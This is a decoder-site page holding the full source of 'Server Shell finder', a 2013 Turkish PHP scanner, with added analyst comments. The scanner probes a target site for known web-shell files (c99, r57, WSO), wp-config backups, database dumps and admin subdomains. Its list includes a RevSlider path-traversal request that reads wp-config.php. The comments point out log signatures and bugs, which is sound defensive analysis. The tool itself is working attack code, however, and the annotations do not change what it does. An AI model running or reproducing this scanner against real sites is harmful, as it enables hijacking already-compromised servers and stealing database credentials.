PHP Decode
/* Decoded by unphp.net */ <?php echo '</head> <body> <body style="background-ima..
Decoded Output download
</head>
<body>
<body style="background-image: url('http://f1301.hizliresim.com/15/p/j5k6y.jpg'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
<center>
<br/>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Server Shell finder The-xatlivacip</title>
<style type="text/css">
body{
background: #000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #e52224;
background: #191919;
color: #e52224
}
.red input{
background: #000;
border: 1px solid #e52224;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #1d7fc3;
background: #191919;
color: #1d7fc3;
}
.green{
float: left;
width: 1000px;
border: 1px solid #5fd419;
background: #191919;
color: #5fd419;
}
</style>
<script type="text/javascript">
<!--
// Writes a fragment into the element whose id is $place.
//   $replace == 0 -> the fragment is appended to the element's current markup
//   otherwise     -> the element's markup is overwritten with the fragment
// $text is assigned to innerHTML unchanged, so the browser parses it as HTML rather
// than inserting it as text; nothing in this function escapes it.
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form">
TARANACAK URL:<br /><input type="text" name="xploit_url" value="None" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Shell Tara knk" align="right" /></span>
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Toplam Taranan: <span id="verified">0</span> / <span id="total">0</span><br />
Bulunan:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br /><center><font color="#0033FF">
<pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:red"><font
color=red>#Marc0 Priv8 2013 Server Shell finder The-xatlivacip [v0.1] <---- ajanlar.org # m4rc0-security.blogspot.com/#</pre>
<hr>
<br />
<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">
Original Code
/* Decoded by unphp.net */
<?php echo '</head>
<body>
<body style="background-image: url(\'http://f1301.hizliresim.com/15/p/j5k6y.jpg\'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
<center>
<br/>
';
// Analyst note: the fragment echoed above is sent before template() prints the real
// document, so every response from this script starts with a stray "</head><body>" pair
// and a background image that the viewer's browser fetches from an external host
// (f1301.hizliresim.com).
// No execution-time cap: the scan further down issues blocking HTTP requests for every
// wordlist entry and is allowed to run for as long as that takes.
set_time_limit(0);
// Every PHP notice, warning and error is hidden; undefined-index reads later in the file
// therefore never show up in the output.
error_reporting(0);
// Two newline-separated wordlists drive the scan.
//   $list['front'] - labels that check() places in front of the target host name
//                    (http://<label>.<host>/) to look for admin / control-panel sub-domains.
//   $list['end']   - paths that check() appends to the submitted base URL.
// Defender view: the 'end' list is largely file names commonly given to web shells and
// uploaders (c99.php, r57.php, WSO.php, ...), leftover wp-config backups, site/database
// archives and login pages. A burst of requests for these names from a single client is
// a usable signature in web-server access logs.
$list['front'] = "admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
web1.php
root.php
wp-config.txt
wp-config.php~
wp-config.bak
wp-config.phpBak
wp-config.php-bak
wp-config.save
wp-config.back
wp-config.old
wp-config.html
wp-config.txt
web.root
izo.cin
/python/
code.php
r0t.php
up.php
up1.php
up2.php
up3.php
uploader.php
upload.php
yukle.php
upl04d3r.php
upload3.php
c0d3.php
sh3ll.php
asd.php
123.php
a.php
rec.php
koyz.php
koy.php
d4.php
kommand.php
kommant.php
command.php
red.php
/wp-includes/SimplePie/theme-options.php
recovers.php
recovery.php
/inc/config.txt
/inc/config.php
sym.php
symroot.php
symlinkuser.php
it.php
config.txt
izo.cin
webr00t.php
web.php
angel.php
/redirect-to/?redirect=http://pagebin.com/JopKidzK
/node/1/edit
/node/2/edit
/node/3/edit
/node/4/edit
/node/5/edit
/node/6/edit
/node/7/edit
/node/8/edit
/node/9/edit
/node/10/edit
/node/11/edit
/node/12/edit
/node/13/edit
/node/14/edit
/node/15/edit
/node/16/edit
/node/17/edit
/node/18/edit
/node/19/edit
/node/20/edit
/node/21/edit
/node/22/edit
/node/23/edit
/node/24/edit
/node/25/edit
/node/26/edit
/node/27/edit
/node/28/edit
/node/29/edit
/node/30/edit
/node/31/edit
options.php
locale.php
WSO.php
dz.php
w.php
/wp-content/plugins/akismet/akismet.php
images/stories/w.php
w.php
/sym/
/configweb/
/symlinkuser/
anon.php
shell.php
madspot.php
Cgishell.pl
killer.php
changeall.php
2.php
Sh3ll.php
dz0.php
dam.php
user.php
dom.php
whmcs.php
r00t.php
1.php
a.php
r0k.php
abc.php
egy.php
syrian_shell.php
xxx.php
settings.php
tmp.php
cyber.php
c99.php
r57.php
404.php
gaza.php
1.php
d4rk.php
index1.php
nkr.php
xd.php
M4r0c.php
Dz.php
sniper.php
ksa.php
v4team.php
offline.php
priv8.php
911.php
madspotshell.php
c100.php
sym.php
cp.php
tmp/cpn.php
tmp/w.php
tmp/r57.php
tmp/king.php
tmp/sok.php
tmp/ss.php
tmp/as.php
tmp/dz.php
tmp/r1z.php
tmp/whmcs.php
tmp/root.php
tmp/r00t.php
templates/beez/index.php
/wp-content/plugins/disqus-comment-system/mysql.php
/wp-content/plugins/disqus-comment-system/WolF.php
/wp-content/plugins/disqus-comment-system/madspot.php
/wp-content/plugins/disqus-comment-system/Cgishell.pl
/wp-content/plugins/disqus-comment-system/killer.php
/wp-content/plugins/disqus-comment-system/changeall.php
/wp-content/plugins/disqus-comment-system/sa.php
/wp-content/plugins/disqus-comment-system/sysadmins/
/wp-content/plugins/disqus-comment-system/admin1/
/wp-content/plugins/disqus-comment-system/sniper.php
/wp-content/plugins/disqus-comment-system/images/Sym.php
/wp-content/plugins/disqus-comment-system//r57.php
/wp-content/plugins/disqus-comment-system/gzaa_spysl
/wp-content/plugins/disqus-comment-system/sql-new.php
/wp-content/plugins/disqus-comment-system//shell.php
/wp-content/plugins/disqus-comment-system//sa.php
/wp-content/plugins/disqus-comment-system//admin.php
/wp-content/plugins/akismet/ssl.php
/wp-content/plugins/akismet/mysql.php
/wp-content/plugins/akismet/WolF.php
/wp-content/plugins/akismet/madspot.php
/wp-content/plugins/akismet/Cgishell.pl
/wp-content/plugins/akismet/killer.php
/wp-content/plugins/akismet/changeall.php
/wp-content/plugins/akismet//sa2.php
/wp-content/plugins/google-sitemap-generator/r00t-s3c.php
/wp-content/plugins/google-sitemap-generator/c.php
/wp-content/plugins/google-sitemap-generator//backup.sql
/wp-content/plugins/google-sitemap-generator//back.sql
/wp-content/plugins/google-sitemap-generator//data.sql
/templates/beez/user.php
/templates/beez/dom.php
/templates/beez/whmcs.php
/templates/beez/vb.zip
/templates/beez/r00t.php
/templates/beez/c99.php
/templates/beez/gaza.php
/templates/beez/1.php
/images/Sym.php
/images/c22.php
/images/c100.php
/images/configuration.php
/images/g.php
/images/xx.pl
/images/ls.php
/images/Cpanel.php
/images/k.php
/images/zone-h.php
/images/tmp/user.php
/images/tmp/Sym.php
/images/cp.php
/images/tmp/madspotshell.php
/images/tmp/root.php
/images/tmp/whmcs.php
/images/tmp/index.php
/images/tmp/2.php
/images/tmp/dz.php
/images/tmp/cpn.php
/images/tmp/changeall.php
/images/tmp/Cgishell.pl
/images/tmp/sql.php
/images/up.php
/images/vb.zip
/images/vb.rar
/images/admin2.asp
/images/uploads.php
/images/sa.php
/images/sysadmins/
/images/admin1/
/images/sniper.php
/images/images/Sym.php
/images//r57.php
/images/gzaa_spysl
/images/sql-new.php
/images//shell.php
/images//sa.php
/images//admin.php
/images//sa2.php
/images//2.php
/images//gaza.php
/images//up.php
/images//upload.php
/images//uploads.php
/images/shell.php
/images//amad.php
/images//t00.php
/images//dz.php
/images//site.rar
/images//Black.php
/images//site.tar.gz
/images//error_log
/images//error
/images//cpanel
/images//awstats
/images//site.sql
/images//vb.sql
/images//forum.sql
/images/r00t-s3c.php
/images/c.php
/images//backup.sql
/images//back.sql
/images//data.sql
/images/wp.rar/
/images/asp.aspx
/images/tmp/vaga.php
/images/tmp/killer.php
/images/whmcs.php
/images/abuhlail.php
/images/X.php
/images/123.php
/images/m.php
/images/b.php
/images/up.php
/images/tmp/dz1.php
/images/dz1.php
/images/forum.zip
/images/Symlink.php
/images/Symlink.pl
/images/forum.rar
/images/joomla.zip
/images/joomla.rar
/images/wp.php
/images/buck.sql
/includes/WSO.php
/includes/dz.php
/includes/DZ.php
/includes/cpanel.php
/includes/cpn.php
/includes/sos.php
/includes/term.php
/includes/Sec-War.php
/includes/sql.php
/includes/ssl.php
/includes/mysql.php
/includes/WolF.php
/includes/madspot.php
/includes/Cgishell.pl
/includes/killer.php
/includes/changeall.php
/includes/2.php
/includes/Sh3ll.php
/includes/dz0.php
/includes/dam.php
/includes/user.php
/includes/dom.php
/includes/whmcs.php
/includes/vb.zip
/includes/r00t.php
/includes/c99.php
/includes/gaza.php
/includes/1.php
/includes/d0mains.php
/includes/madspotshell.php
/includes/info.php
/includes/egyshell.php
/includes/Sym.php
/includes/c22.php
/includes/c100.php
/includes/configuration.php
/includes/g.php
/includes/xx.pl
/includes/ls.php
/includes/Cpanel.php
/includes/k.php
/includes/zone-h.php
/includes/tmp/user.php
/includes/tmp/Sym.php
/includes/cp.php
/includes/tmp/madspotshell.php
/includes/tmp/root.php
/includes/tmp/whmcs.php
/includes/tmp/index.php
/includes/tmp/2.php
/includes/tmp/dz.php
/includes/tmp/cpn.php
/includes/tmp/changeall.php
/includes/tmp/Cgishell.pl
/includes/tmp/sql.php
/includes/0day.php
/includes/tmp/admin.php
/includes/L3b.php
/includes/d.php
/includes/tmp/d.php
/includes/tmp/L3b.php
/includes/sado.php
/includes/admin1.php
/includes/upload.php
/includes/up.php
/includes/vb.zip
/includes/vb.rar
/includes/admin2.asp
/includes/uploads.php
/includes/sa.php
/includes/sysadmins/
/templates/rhuk_milkyway/tmp/d.php
/templates/rhuk_milkyway/tmp/L3b.php
/templates/rhuk_milkyway/sado.php
/templates/rhuk_milkyway/admin1.php
/templates/rhuk_milkyway/upload.php
/templates/rhuk_milkyway/
WSO.php
a.php
z.php
e.php
r.php
t.php
y.php
u.php
i.php
o.php
p.php
q.php
s.php
d.php
f.php
g.php
h.php
j.php
k.php
l.php
m.php
w.php
x.php
c.php
v.php
b.php
n.php
1.php
2.php
3.php
4.php
5.php
6.php
7.php
8.php
9.php
10.php
12.php
11.php
1234.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
login.htm
login.html
admin.htm
admin.html
yonetim.asp
yonetim.php
giris.php
login.asp
wp-login
wp-login.php
/admin/
/login
/panel/
/yonetim/
/giris/
UserLogin
login.php
admin.php
admin.asp
admin.html
administrator.php
administrator.asp
admincp
admin/login.php
admin/login.asp gibidir.
faa_tools/login.php?prev_page=/faa_tools/
/wseltzer/Antitrust
/training/compendium/administer/admintrainingevents.aspx
sh3ll.php
ssh.php
ps/ps.php
templates/undp_2/index.php
templates/undp_2/r57.php
templates/undp_2/c99.php
templates/undp_2/c100.php
templates/undp/r00t.php
templates/undp/sym.php
templates/undp/wsob.php
templates/undp/web1.php
templates/undp/cgiweb
/templates/beez/shell.php
/templates/beez/r57.php
/templates/beez/c99.php
/templates/beez/c100.php
/templates/beez/safe.php
/templates/beez/bypass.php
/templates/beez/r00t.php
/templates/beez/sym.php
/templates/beez/cgiweb
/templates/shell.php
/templates/r57.php
/templates/c99.php
/templates/c100.php
/templates/sym.php
/templates/cgiweb
cache/
cgishell
cgiweb
/admin/anket.php
domain.php
dom.php
python
templates/beez/cgirun
templates/beez/configler
templates/beez/cgitelnet1
sym
sym.php
wsob.php
r00t.php
cgiweb/";
/**
 * Prints the scanner's complete HTML page in one echo: the CSS, the insertcode()
 * JavaScript helper, the URL form, and the three output panes that show() later writes
 * into (#rightcol for hits, #logbox for the running log, #verified / #total counters).
 *
 * Takes no parameters and returns nothing; all output goes straight to the response.
 *
 * UI strings are Turkish: "TARANACAK URL" = "URL to scan", "Shell Tara knk" is the
 * submit button ("scan for shells"), "Toplam Taranan" = "total scanned",
 * "Bulunan" = "found".
 *
 * NOTE(review): $_POST['xploit_url'] is concatenated into the value="" attribute with
 * no htmlspecialchars(), so the page reflects whatever was posted back into its own
 * markup (reflected XSS in the tool's UI).
 * NOTE(review): template() is called before the caller's isset() check, so on a plain
 * GET this reads an undefined index; error_reporting(0) hides the resulting notice.
 */
function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Server Shell finder The-xatlivacip</title>
<style type="text/css">
body{
background: #000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #e52224;
background: #191919;
color: #e52224
}
.red input{
background: #000;
border: 1px solid #e52224;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #1d7fc3;
background: #191919;
color: #1d7fc3;
}
.green{
float: left;
width: 1000px;
border: 1px solid #5fd419;
background: #191919;
color: #5fd419;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form">
TARANACAK URL:<br /><input type="text" name="xploit_url" value="' . $_POST['xploit_url'] . '" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Shell Tara knk" align="right" /></span>
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Toplam Taranan: <span id="verified">0</span> / <span id="total">0</span><br />
Bulunan:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br /><center><font color="#0033FF">
<pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:red"><font
color=red>#Marc0 Priv8 2013 Server Shell finder The-xatlivacip [v0.1] <---- ajanlar.org # m4rc0-security.blogspot.com/#</pre>
<hr>
<br />
<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
/**
 * Streams one status update to the browser by emitting a <script> element that calls
 * the page's insertcode() helper.
 *
 * @param mixed  $msg     HTML fragment or counter value to display
 * @param int    $br      1 appends "<br />" to $msg before it is sent
 * @param int    $stop    1 ends the script immediately after the echo
 * @param string $place   id of the DOM element insertcode() writes into
 * @param int    $replace 0 appends to that element; any other value overwrites it
 *                        (the decision is made in insertcode())
 */
function show($msg, $br = 1, $stop = 0, $place = 'logbox', $replace = 0) {
if ($br == 1) $msg.= "<br />";
// NOTE(review): $msg, $place and $replace are pasted into single-quoted JavaScript
// string literals with no escaping. The callers build $msg from the submitted URL and
// the wordlist entries, so a quote or "</script>" in that data breaks out of the literal
// and the text then reaches innerHTML unescaped.
echo "<script type=\"text/javascript\">insertcode('" . $msg . "', '" . $place . "', '" . $replace . "');</script>";
// When $stop is set the script exits here, before the flush calls below are reached.
if ($stop == 1) exit;
// Flush after every message so progress is visible while the scan is still running;
// the @ operator suppresses the notice ob_flush() raises when no output buffer is active.
@flush();
@ob_flush();
}
/**
 * Decides whether one candidate location is reported as "found" on the target.
 *
 * @param string $x     wordlist entry
 * @param int    $front 0: $x is appended to the global $site as a path;
 *                      otherwise $x becomes a host-name label: http://$x.$site/
 * @return int 1 when the location is counted as found, 0 otherwise
 *
 * Defender view: each candidate produces up to two requests for the same URL, one from
 * get_headers() and one from file_get_contents(). Both come from PHP's HTTP stream
 * wrapper on the machine running this script; presumably they carry no User-Agent
 * header unless the host's user_agent ini setting is configured - confirm against logs.
 */
function check($x, $front = 0) {
// $_POST is a superglobal, so listing it is redundant. $site and $false are assigned by
// the top-level code further down the file.
global $_POST, $site, $false;
if ($front == 0) $t = $site . $x;
else $t = 'http://' . $x . '.' . $site . '/';
$headers = get_headers($t);
// NOTE(review): eregi() was removed in PHP 7, which dates this sample to PHP 5.x hosts.
// The test matches the text "200" anywhere in the first header line instead of comparing
// the status code itself.
if (!eregi('200', $headers[0])) return 0;
// Second fetch of the same URL, this time for the body; @ hides any fetch warning.
$data = @file_get_contents($t);
// Soft-404 filter, variant 1: no marker string was posted, so the body is compared
// (loosely, with ==) against $false, the baseline body captured for a name that should
// not exist. NOTE(review): the form printed by template() has no xploit_404string
// field, so unless the request is hand-crafted this index is undefined and this
// variant is the one that applies.
if ($_POST['xploit_404string'] == "") if ($data == $false) return 0;
// Variant 2: a marker string was posted; a body containing it is treated as the site's
// "not found" page. NOTE(review): strpos() is used as a boolean, so a marker at offset 0
// is not detected.
if ($_POST['xploit_404string'] != "") if (strpos($data, $_POST['xploit_404string'])) return 0;
return 1;
}
// ---- Top-level driver (analyst annotations) ----
// The page is rendered first; the script then stops unless a non-empty xploit_url was posted.
template();
if (!isset($_POST['xploit_url'])) die;
if ($_POST['xploit_url'] == '') die;
// The posted value becomes the scan base with no scheme or host validation. Every request
// made from here on (get_headers() / file_get_contents() in check()) is issued by the
// server hosting this file, so that server is the visible source of the scan traffic.
$site = $_POST['xploit_url'];
if ($site[strlen($site) - 1] != "/") $site.= "/";
// Soft-404 baseline: fetch a file name that should not exist and keep the body in $false
// for check() to compare against. The name is a fixed string, so a request for
// "d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html" in an access log is a
// direct indicator that this tool was pointed at the site.
if ($_POST['xploit_404string'] == "") $false = @file_get_contents($site . "d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
// NOTE(review): as rendered on this page the str_replace() search string and the
// explode() delimiter both look like a bare line break. Presumably the original strips
// "\r" and then splits on "\n"; the decoded listing does not let the two be told apart.
$list['end'] = str_replace("
", "", $list['end']);
$list['front'] = str_replace("
", "", $list['front']);
$pathes = explode("
", $list['end']);
$frontpathes = explode("
", $list['front']);
// Publish the total number of candidates to the #total counter.
show(count($pathes) + count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
// Pass 1: path candidates appended to the base URL, requested one after another with no
// delay between them. Log strings are Turkish: "Tarıyorum" = "scanning",
// "Bulunamadı" = "not found", "Buldu" = "found".
foreach ($pathes as $path) {
show('Tarıyorum reis ' . $site . $path . ' : ', 0, 0, 'logbox', 0);
$verificate++;
show($verificate, 0, 0, 'verified', 1);
if (check($path) == 0) show('Bulunamadı :(', 1, 0, 'logbox', 0);
else {
show('<span style="color: #00FF00;"><strong>Buldu</strong></span>', 1, 0, 'logbox', 0);
// Hits are listed as links in the #rightcol pane; the URL is inserted without escaping.
show('<a href="' . $site . $path . '">' . $site . $path . '</a>', 1, 0, 'rightcol', 0);
}
}
// Reduce the base URL to its host part (the text between "//" and the next "/"), then
// drop a leading "www" together with the one character that follows it.
// NOTE(review): the preg_match() result is not checked; if the pattern does not match,
// $xx[1] is undefined and $site becomes null.
preg_match("/\/\/(.*?)\//i", $site, $xx);
$site = $xx[1];
if (substr($site, 0, 3) == "www") $site = substr($site, 4);
// Pass 2: host-name candidates, http://<label>.<host>/. These cause a DNS lookup for each
// label before any HTTP request is made, so resolver logs are a second place to look.
foreach ($frontpathes as $frontpath) {
show('Tarıyorum reis http://' . $frontpath . '.' . $site . '/ : ', 0, 0, 'logbox', 0);
$verificate++;
show($verificate, 0, 0, 'verified', 1);
if (check($frontpath, 1) == 0) show('Bulunamadı :(', 1, 0, 'logbox', 0);
else {
show('<span style="color: #00FF00;"><strong>Buldu</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://' . $frontpath . '.' . $site . '/">' . $frontpath . '.' . $site . '</a>', 1, 0, 'rightcol', 0);
}
};
echo '
';
Function Calls
| strlen | 1 |
| template | 1 |
| set_time_limit | 1 |
| error_reporting | 1 |
Stats
| MD5 | 267ab11a6b90eeed2d3b77ffab985d5e |
| Eval Count | 0 |
| Decode Time | 146 ms |